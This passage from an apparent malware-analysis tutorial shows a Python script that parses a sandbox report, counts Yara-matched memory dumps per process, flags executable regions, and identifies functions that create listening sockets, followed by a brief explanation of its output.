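                "executable": bool(prot & PAGE_EXECUTE_MASK),
                "raw_tail": m.group(6, 7, 8),   # fields this example does not decode
            })
        elif m := PROC_RE.search(line):
            procs.append((m.group(1), int(m.group(2))))
        elif m := FUNC_RE.search(line):
            funcs.append({
                "image": m.group(1),
                "id": f"{m.group(2)}_{m.group(3)}_{m.group(4)}",
                "process_index": int(m.group(2)),   # assumed decimal
                "calls": [c for c in m.group(5).split(",") if c],
            })
    return {"dumps": dumps, "processes": procs, "functions": funcs}


def dumps_by_process(parsed):
    """Count Yara-matched dumps per process index and how many are executable,
    i.e. the regions to pull first when looking for the unpacked payload."""
    out = defaultdict(lambda: {"dumps": 0, "executable": 0})
    for d in parsed["dumps"]:
        out[d["process_index"]]["dumps"] += 1
        out[d["process_index"]]["executable"] += int(d["executable"])
    return dict(out)


def listening_functions(parsed):
    """Ids of code functions whose chain creates, binds and listens on a socket
    (server-side behaviour, as opposed to a plain bind-and-close probe)."""
    return [f["id"] for f in parsed["functions"]
            if {"socket", "bind", "listen"} <= set(f["calls"])]


if __name__ == "__main__":
    parsed = parse_report(SAMPLE_LINES)
    for idx, stats in sorted(dumps_by_process(parsed).items()):
        print(f"process {idx:#x}: {stats['dumps']} dump(s), {stats['executable']} executable")
    print("processes with string hits:", parsed["processes"])
    print("listening functions:", listening_functions(parsed))
```

On the sample lines the script reports one non-executable dump for process 0x10, one PAGE_EXECUTE_READWRITE dump for process 0x13, and marks only 2_2_00391B61 as a listening function, since 2_2_00392163 binds and closes without calling listen. Feeding it the whole report instead of the six sample lines gives the per-process dump counts the analyst needs to decide which dumps to carve.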
Legend of the contacted-IP distribution chart (chart image not included): No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs